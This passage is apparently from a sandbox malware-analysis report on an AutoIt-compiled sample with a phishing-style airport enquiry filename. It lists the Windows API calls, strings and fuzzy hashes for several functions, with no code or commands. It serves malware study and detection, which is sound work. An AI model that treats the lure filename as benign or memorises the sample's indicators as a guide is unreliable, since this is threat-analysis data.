            • SelectObject.GDI32(?,00000000), ref: 00D0ABFA
            • SetBkColor.GDI32(?,00000000), ref: 00D0AC03
            • SelectObject.GDI32(?,?), ref: 00D0AC10
            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D0AC2F
            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D0AC46
            • GetWindowLongW.USER32(00000000,000000F0), ref: 00D0AC5B
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D0ACA7
            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00D0ACCE
            • InflateRect.USER32(?,000000FD,000000FD), ref: 00D0ACEC
            • DrawFocusRect.USER32(?,?), ref: 00D0ACF7
            • GetSysColor.USER32(00000011), ref: 00D0AD05
            • SetTextColor.GDI32(?,00000000), ref: 00D0AD0D
            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00D0AD21
            • SelectObject.GDI32(?,00D0A869), ref: 00D0AD38
            • DeleteObject.GDI32(?), ref: 00D0AD43
            • SelectObject.GDI32(?,?), ref: 00D0AD49
            • DeleteObject.GDI32(?), ref: 00D0AD4E
            • SetTextColor.GDI32(?,?), ref: 00D0AD54
            • SetBkColor.GDI32(?,?), ref: 00D0AD5E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
            • String ID:
            • API String ID: 1996641542-0
            • Opcode ID: 2099cbad8c6342c3a250e277f25e327a8806d649bf0a760c156e64142236f9f9
            • Instruction ID: 941848dd962d48d7511ed3cff606dc34dc11d6d5e0ab1a40b6851b134bec81ec
            • Opcode Fuzzy Hash: 2099cbad8c6342c3a250e277f25e327a8806d649bf0a760c156e64142236f9f9
            • Instruction Fuzzy Hash: 3E614D71900318EFDB219FA8DC48FAE7B79EB08320F254525F919EB2E1D6759D40DBA0
            Function 00D08C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00D08D34
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D08D45
            • CharNextW.USER32(0000014E), ref: 00D08D74
            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00D08DB5
            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00D08DCB
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D08DDC
            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00D08DF9
            • SetWindowTextW.USER32(?,0000014E), ref: 00D08E45
            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00D08E5B
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D08E8C
            • _memset.LIBCMT ref: 00D08EB1
            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00D08EFA
            • _memset.LIBCMT ref: 00D08F59
            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D08F83
            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00D08FDB
            • SendMessageW.USER32(?,0000133D,?,?), ref: 00D09088
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D090AA
            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D090F4
            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D09121
            • DrawMenuBar.USER32(?), ref: 00D09130
            • SetWindowTextW.USER32(?,0000014E), ref: 00D09158
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
            • String ID: 0
            • API String ID: 1073566785-4108050209
            • Opcode ID: 3e8bb2aab5c9eeac1c4e866076bb66f5f4f27035a36b2861e94d7130b3f51d65
            • Instruction ID: e7541bee513940f7b8fc08510e40513e1d64846bdfa1c5d48ef87374e7f1178d
            • Opcode Fuzzy Hash: 3e8bb2aab5c9eeac1c4e866076bb66f5f4f27035a36b2861e94d7130b3f51d65
            • Instruction Fuzzy Hash: 74E17E70900219AFDB209F64CC88BEEBBB9EF05714F148155F959AA2D1DB708A81EF71
            Function 00D04B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
            Download Yara Rule
            APIs
            • GetCursorPos.USER32(?), ref: 00D04C51
            • GetDesktopWindow.USER32 ref: 00D04C66
            • GetWindowRect.USER32(00000000), ref: 00D04C6D
            • GetWindowLongW.USER32(?,000000F0), ref: 00D04CCF
            • DestroyWindow.USER32(?), ref: 00D04CFB
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D04D24
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D04D42
            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00D04D68
            • SendMessageW.USER32(?,00000421,?,?), ref: 00D04D7D
            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00D04D90
            • IsWindowVisible.USER32(?), ref: 00D04DB0
            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00D04DCB
            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00D04DDF
            • GetWindowRect.USER32(?,?), ref: 00D04DF7
            • MonitorFromPoint.USER32(?,?,00000002), ref: 00D04E1D
            • GetMonitorInfoW.USER32(00000000,?), ref: 00D04E37
            • CopyRect.USER32(?,?), ref: 00D04E4E
            • SendMessageW.USER32(?,00000412,00000000), ref: 00D04EB9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
            • String ID: ($0$tooltips_class32
            • API String ID: 698492251-4156429822
            • Opcode ID: 58edac6ef28f288ec6d87ce611b4163c7b99897bda080bf4227cb92aeef64908
            • Instruction ID: 7fe929c6c9bf5c16660cafc3db72caa896bd64b9a86f1d004035b5b756544561
            • Opcode Fuzzy Hash: 58edac6ef28f288ec6d87ce611b4163c7b99897bda080bf4227cb92aeef64908
            • Instruction Fuzzy Hash: 9FB158B1604340AFDB14DF64C848B6ABBE4FF88714F04891DF69D9B2A1DB71E805CBA5
            Function 00C827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
            Download Yara Rule
            APIs
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C828BC
            • GetSystemMetrics.USER32(00000007), ref: 00C828C4
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C828EF
            • GetSystemMetrics.USER32(00000008), ref: 00C828F7
            • GetSystemMetrics.USER32(00000004), ref: 00C8291C
            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C82939
            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C82949
            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C8297C
            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C82990
            • GetClientRect.USER32(00000000,000000FF), ref: 00C829AE
            • GetStockObject.GDI32(00000011), ref: 00C829CA
            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C829D5
              • Part of subcall function 00C82344: GetCursorPos.USER32(?), ref: 00C82357
              • Part of subcall function 00C82344: ScreenToClient.USER32(00D467B0,?), ref: 00C82374
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000001), ref: 00C82399
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000002), ref: 00C823A7
            • SetTimer.USER32(00000000,00000000,00000028,00C81256), ref: 00C829FC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
            • String ID: AutoIt v3 GUI
            • API String ID: 1458621304-248962490
            • Opcode ID: cd8349fed01b7276c325a39e2bb2e3174cf87ce4a663f3dd0842fee2f7d61168
            • Instruction ID: 95a03239a8af221bcfc5df7a4e2381b9ce906c1514774e739d73fc369de118a8
            • Opcode Fuzzy Hash: cd8349fed01b7276c325a39e2bb2e3174cf87ce4a663f3dd0842fee2f7d61168
            • Instruction Fuzzy Hash: D4B15D7560020A9FDB14EFA8DC89BEE7BA4FB08714F104129FA16E72E0DB74D941CB65
            Function 00D04069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 00D040F6
            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00D041B6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharMessageSendUpper
            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
            • API String ID: 3974292440-719923060
            • Opcode ID: 2d00b0fb9941601b2f7357cc1a5593e137fc734bcf08d26f72a75cc2896e8e7f
            • Instruction ID: 34861d242ca97dcd726f424039113b22a89335e6a6b00125be33bfa8a58e32e9
            • Opcode Fuzzy Hash: 2d00b0fb9941601b2f7357cc1a5593e137fc734bcf08d26f72a75cc2896e8e7f
            • Instruction Fuzzy Hash: 2FA18EB02143019BCB14EF20C991F7AB3A5EF85318F18496DB99A9B3D2DB30EC05DB65
            Function 00CF52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
            Download Yara Rule
            APIs
            • LoadCursorW.USER32(00000000,00007F89), ref: 00CF5309
            • LoadCursorW.USER32(00000000,00007F8A), ref: 00CF5314
            • LoadCursorW.USER32(00000000,00007F00), ref: 00CF531F
            • LoadCursorW.USER32(00000000,00007F03), ref: 00CF532A
            • LoadCursorW.USER32(00000000,00007F8B), ref: 00CF5335
            • LoadCursorW.USER32(00000000,00007F01), ref: 00CF5340
            • LoadCursorW.USER32(00000000,00007F81), ref: 00CF534B
            • LoadCursorW.USER32(00000000,00007F88), ref: 00CF5356
            • LoadCursorW.USER32(00000000,00007F80), ref: 00CF5361
            • LoadCursorW.USER32(00000000,00007F86), ref: 00CF536C
            • LoadCursorW.USER32(00000000,00007F83), ref: 00CF5377
            • LoadCursorW.USER32(00000000,00007F85), ref: 00CF5382
            • LoadCursorW.USER32(00000000,00007F82), ref: 00CF538D
            • LoadCursorW.USER32(00000000,00007F84), ref: 00CF5398
            • LoadCursorW.USER32(00000000,00007F04), ref: 00CF53A3
            • LoadCursorW.USER32(00000000,00007F02), ref: 00CF53AE
            • GetCursorInfo.USER32(?), ref: 00CF53BE
            • GetLastError.KERNEL32(00000001,00000000), ref: 00CF53E9
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Cursor$Load$ErrorInfoLast
            • String ID:
            • API String ID: 3215588206-0
            • Opcode ID: c738e193a047bbe9ab78bdb84d3f80d8dcff68d043658a7e861f465aef68cc16
            • Instruction ID: b25b3549bcfd767511b9c88e9966ca4e7e8681e1a79ae7c636296a2e0297d046
            • Opcode Fuzzy Hash: c738e193a047bbe9ab78bdb84d3f80d8dcff68d043658a7e861f465aef68cc16
            • Instruction Fuzzy Hash: FF418670E043196ADB509FBA8C4996FFFF8EF51B10B10452FE619E7290DAB8A501CE61
            Function 00CDAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
            Download Yara Rule
            APIs
            • GetClassNameW.USER32(?,?,00000100), ref: 00CDAAA5
            • __swprintf.LIBCMT ref: 00CDAB46
            • _wcscmp.LIBCMT ref: 00CDAB59
            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CDABAE
            • _wcscmp.LIBCMT ref: 00CDABEA
            • GetClassNameW.USER32(?,?,00000400), ref: 00CDAC21
            • GetDlgCtrlID.USER32(?), ref: 00CDAC73
            • GetWindowRect.USER32(?,?), ref: 00CDACA9
            • GetParent.USER32(?), ref: 00CDACC7
            • ScreenToClient.USER32(00000000), ref: 00CDACCE
            • GetClassNameW.USER32(?,?,00000100), ref: 00CDAD48
            • _wcscmp.LIBCMT ref: 00CDAD5C
            • GetWindowTextW.USER32(?,?,00000400), ref: 00CDAD82
            • _wcscmp.LIBCMT ref: 00CDAD96
              • Part of subcall function 00CA386C: _iswctype.LIBCMT ref: 00CA3874
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
            • String ID: %s%u
            • API String ID: 3744389584-679674701
            • Opcode ID: 5c55aff145886df31474776950232e4e55d519dfeaa614947954cb9891935d7b
            • Instruction ID: da888eb540ac3e589e671e66e8fe832b2bca8d5add17e25475d6c00540257d9a
            • Opcode Fuzzy Hash: 5c55aff145886df31474776950232e4e55d519dfeaa614947954cb9891935d7b
            • Instruction Fuzzy Hash: 39A1F571204706AFDB14DF20C884FAAF7E9FF44315F10462AFAA9C2690D730EA55DB92
            Function 00CDB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
            Download Yara Rule
            APIs
            • GetClassNameW.USER32(00000008,?,00000400), ref: 00CDB3DB
            • _wcscmp.LIBCMT ref: 00CDB3EC
            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CDB414
            • CharUpperBuffW.USER32(?,00000000), ref: 00CDB431
            • _wcscmp.LIBCMT ref: 00CDB44F
            • _wcsstr.LIBCMT ref: 00CDB460
            • GetClassNameW.USER32(00000018,?,00000400), ref: 00CDB498
            • _wcscmp.LIBCMT ref: 00CDB4A8
            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CDB4CF
            • GetClassNameW.USER32(00000018,?,00000400), ref: 00CDB518
            • _wcscmp.LIBCMT ref: 00CDB528
            • GetClassNameW.USER32(00000010,?,00000400), ref: 00CDB550
            • GetWindowRect.USER32(00000004,?), ref: 00CDB5B9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
            • String ID: @$ThumbnailClass
            • API String ID: 1788623398-1539354611
            • Opcode ID: cf64751e5def39c46b24a1f9836f673b823fbf8c60727445f45d9523f6a8950b
            • Instruction ID: 58be0c2267ec4694483526f34674648ec9b88d5347914b80b5d7c110fcc30f6b
            • Opcode Fuzzy Hash: cf64751e5def39c46b24a1f9836f673b823fbf8c60727445f45d9523f6a8950b
            • Instruction Fuzzy Hash: 4F81B171008306DBDB14DF10D885FAAB7E8EF44714F14856AFE998A292EB30DE46DB61
            Function 00CDB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wcsnicmp
            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
            • API String ID: 1038674560-1810252412
            • Opcode ID: af80fb2d4e996f1cdcf958410144874e35b31c8781965f57e00c3516ed44f7fa
            • Instruction ID: c364ea1b8c47672262473defe7c6ea2820a20dbed2a52e4524a74a2376ca203a
            • Opcode Fuzzy Hash: af80fb2d4e996f1cdcf958410144874e35b31c8781965f57e00c3516ed44f7fa
            • Instruction Fuzzy Hash: 2B310932904305EADB14FA61CDA3EEEB7B49F10754F60012AF551711D2FFA1AF08E665
            Function 00CDC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
            Download Yara Rule
            APIs
            • LoadIconW.USER32(00000063), ref: 00CDC4D4
            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CDC4E6
            • SetWindowTextW.USER32(?,?), ref: 00CDC4FD
            • GetDlgItem.USER32(?,000003EA), ref: 00CDC512
            • SetWindowTextW.USER32(00000000,?), ref: 00CDC518
            • GetDlgItem.USER32(?,000003E9), ref: 00CDC528
            • SetWindowTextW.USER32(00000000,?), ref: 00CDC52E
            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CDC54F
            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CDC569
            • GetWindowRect.USER32(?,?), ref: 00CDC572
            • SetWindowTextW.USER32(?,?), ref: 00CDC5DD
            • GetDesktopWindow.USER32 ref: 00CDC5E3
            • GetWindowRect.USER32(00000000), ref: 00CDC5EA
            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CDC636
            • GetClientRect.USER32(?,?), ref: 00CDC643
            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CDC668
            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CDC693
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
            • String ID:
            • API String ID: 3869813825-0
            • Opcode ID: 8968b6f498d12b7195a65e4297b20077bc5f590d4745ffd6ce8ec38d9f1dd62b
            • Instruction ID: e6fba0d6fb25be89c8f4db6c3796876b58ce75f673d614b40d1611e26a92042b
            • Opcode Fuzzy Hash: 8968b6f498d12b7195a65e4297b20077bc5f590d4745ffd6ce8ec38d9f1dd62b
            • Instruction Fuzzy Hash: 67519D3090070AAFDB20DFA8DD85B6EBBF5FF04704F100929E696A26A0D771E905DB50
            Function 00D0A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00D0A4C8
            • DestroyWindow.USER32(00000000,?), ref: 00D0A542
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D0A5BC
            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D0A5DE
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D0A5F1
            • DestroyWindow.USER32(00000000), ref: 00D0A613
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C80000,00000000), ref: 00D0A64A
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D0A663
            • GetDesktopWindow.USER32 ref: 00D0A67C
            • GetWindowRect.USER32(00000000), ref: 00D0A683
            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D0A69B
            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D0A6B3
              • Part of subcall function 00C825DB: GetWindowLongW.USER32(?,000000EB), ref: 00C825EC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
            • String ID: 0$tooltips_class32
            • API String ID: 1297703922-3619404913
            • Opcode ID: 7476f88e5ff743ba57ffbe910a254aadaa4ebefd2ad0bd7f427426b78cd1006d
            • Instruction ID: b8df284caab1e5f272f27aab0604a2c5a861ab79efe77909a3ac9a7ddc3d8ff1
            • Opcode Fuzzy Hash: 7476f88e5ff743ba57ffbe910a254aadaa4ebefd2ad0bd7f427426b78cd1006d
            • Instruction Fuzzy Hash: 2F718870140705AFD720DF28CC49F6A7BF5EB89304F98492DF989872A1D772E942CB26
            Function 00D0C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DragQueryPoint.SHELL32(?,?), ref: 00D0C917
              • Part of subcall function 00D0ADF1: ClientToScreen.USER32(?,?), ref: 00D0AE1A
              • Part of subcall function 00D0ADF1: GetWindowRect.USER32(?,?), ref: 00D0AE90
              • Part of subcall function 00D0ADF1: PtInRect.USER32(?,?,00D0C304), ref: 00D0AEA0
            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D0C980
            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D0C98B
            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D0C9AE
            • _wcscat.LIBCMT ref: 00D0C9DE
            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D0C9F5
            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D0CA0E
            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D0CA25
            • SendMessageW.USER32(?,000000B1,?,?), ref: 00D0CA47
            • DragFinish.SHELL32(?), ref: 00D0CA4E
            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00D0CB41
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
